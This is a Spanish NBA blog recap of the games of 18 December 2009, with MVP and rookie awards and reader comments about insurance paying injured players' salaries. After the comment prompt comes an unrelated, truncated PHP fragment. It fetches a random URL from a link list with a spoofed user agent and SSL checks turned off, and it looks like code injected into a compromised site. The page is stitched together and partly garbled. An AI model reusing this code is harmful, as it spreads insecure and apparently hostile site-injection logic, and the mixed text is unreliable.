La Crónica (18/12/2009)

19 de December de 2009 por Viva_Dirk

En una noche en la que muchos de nosotros hemos llegado de día a casa se han disputado 11 partidos, para todos los gustos como cada viernes.

El duelo de la jornada estaba en Texas donde los Rockets ganaron a unos Mavs que se quedaron sin faro a los 10 minutos de partido cuando Dirk Nowitzki tuvo que retirarse con problemas en un codo. Sin él llegaron a forzar una prórroga pero no fue bastante. Eso sí, el duelo de bases fue bestial. El sorpresón de la jornada fue la victoria de los Sixers ante los Celtics en el Garden gracias a Allen Iver… ¡Ah, no! Que no jugó The Answer :]. Fueron Brand y Speights, desde el banco, los que destrozaron a los de Rivers.

En los duelos de equipos de la zona media-baja los Raptors apalizaron a los Nets con un apabullante 59% en tiros de campo, los Wolves ganaron a los Kings gracias a una gran actuación de Kevin Love en particular y de todo el quinteto en general e Indiana no tuvo nada que hacer frente al juego interior de Memphis. Zach&Marc les hicieron 43 puntos, 30 rebotes y 8 asistencias, mientras Mayo y Conley machacaban desde la línea de 3. Por su parte, los Thunder vencieron a unos muy mermados Pistons y Gilbert Arenas cuajó el primer partido digno del ‘Agente 0’ para ganar a los Warriors. Para que no se enfade Xapa comentar que los Clippers perdieron en el Madison frente los Knicks.

Cleveland sufrió más de la cuenta para imponerse a los Bucks y siguen creando muchas dudas porque ni Jennings, ni Bogut ni Redd hicieron un gran partido como para ver una victoria tan raspada. Los Hornets sí ofrecieron su mejor cara y ayer ganaron a Denver con una actuación sobrenatural de Chris Paul. Por último, Atlanta sigue firme y los Jazz se quedaron en 83 puntos en su visita al Philips Arena mientras veían unas clases de ‘albañilería y fontanería’ por parte de Josh Smith.

PREMIOS

MVP: Sólo dos nombre tienen hoy sitio aquí: Chris Paul y Gilbert Arenas. Paul aprovechó la ausencia de Billups para anotar 30 puntos, dar 19 asistencias, coger 9 rebotes y anotar 13 de sus 20 tiros. Recuerdo pocas actuaciones de este calibre y son de otros tiempos. Por su parte Arenas anotó 45 puntos y repartió 13 asistencias para ganar a los Warriors.

Rookie: El rookie del día fue, sin duda, Stephen Curry que ante Gilbert Arenas anotó 27 puntos,cogió 8 rebotes y repartió 4 asistencias. Eric Maynor fue de lo poco salvable de su equipo en la derrota frente a los Hawks y saliendo desde el banco se quedó cerca del triple doble con 11 puntos, 7 rebotes y 7 asistencias. Destacamos también los 21 puntos de Omri Casspi, los 16 de DeRozan y los 14 de Ty Lawson y Tyler Hansbrough.

Sorpresa: Buen partido de la  pareja Brand-Speights. Al primero hay días al que podemos dar por perdido y el segundo poco a poco vuelve al nivel de antes de la lesión. Buenas noticias para los Sixers.

Decepción: La del quinteto de los Jazz. Obviando al rookie Walter Matthews, el resto se marcó un impresionante 7 de 32. Los Hawks, con Josh Smith a la cabeza, les pasaron por encima.

Esfuerzo en vano: Con 3 jugadores importantes lesionados difícil lo tienen los Pistons para ganar partidos a pesar de actuaciones como la de anoche de Rodney Stuckey que anotó 31 puntos. El trío Curry-Ellis-Maggette anotó 80 puntos que no sirvieron para vencer a los Wizards.

Comenta

6 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Cada vez que veo un partido de Celtics en casa, tengo la sensación de que son el equipo al que más facvorecen los arbitrajes, no digo ni mucho menos que el 20-5 se deba a los arbitros, pero siempre que hay acciones dudosas, el balón es para Celtics, y la falta favorable a Garnett a 20 seg. del final es de risa,
    Por otra parte, daimiel habló sobre T-Mac, y dijo algo cómo que este año su salario se lo paga una póliza de seguros, pero la verdad es que no me enteré bien. ¿es que Cuándo un jugador tiene una lesión grave como la de T_Mac, el equipo no es el responsable de pagarle el sueldo? Gracias, si alguien me responde.
    Muy bueno, Viva Dirk, lo de gracias a Allen Iver.. ah no que no jugó. je je.

      Citar

  2. max dice:
    #2

    Viva, los problemas en el codo de Nowitzki fueron debidos a un codazo que dio a Landry en la cara, rompiéndole cinco dientes de los cuales dos se le quedaron clavados. Landry tampoco pudo continuar el partido.

      Citar

  3. sergio dice:
    #3

    Vaya mariquituso esta hecho Landry que no quiso seguir jugando….

    Ayer Toronto parecia un gran equipo con todos aportando y haciendo defensa y contragolpe de muchos quilates. Contra los Nets ya pueden ya.

    En cuanto a lo de las polizas de seguros, no conozco este caso en particular pero si es muy normal que las grandes estrellas tengan contratadas con las aseguradoras polizas de ese tipo. Y existe en todos los deportes, por ejemplo a Massa le pago el sueldo una aseguradora por lo del tornillazo y a Cristiano Ronaldo por su lesion de tobillo. Pero en ambos casos creo recordar que era solo con un limite de meses que acuerdan ambas partes. No conozco el caso T-Mac, intentare informarme si no te solventan la duda antes.

      Citar

  4. Viva_Dirk dice:
    #4

    @L.Denise: El tema de las pólizas creo que viene de convenio en la NBA, aunque en algunos casos es especial en jugadores muy propensos a lesionarse, casos que me suenen de que era un seguro el que pagaba el salario son los de Houston y Miles, porque estaban incapacitados para la practica del basket.

      Citar

  5. Dantley2 dice:
    #5

    Cierto, se lo paga el seguro. Hoy día se puede asegurar casi todo. Eso sí, se lo pague el seguro o no, cuenta para el límite salarial. El valor de McGrady ahora mismo como expiring es gigantesco. La duda es si Houston lo va a usar para sí mismo y esperar a 2011 para pescar algo gordo, o si lo va a utilizar antes del deadline para reforzar el equipo y aspirar a pelear casi diría yo viendo como Adelman hace milagros, casi a ser la alternativa a Lakers.

      Citar

  6. Love Denise dice:
    #6

    Gracias a Sergio, Viva y Dantley por responder a mis dudas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>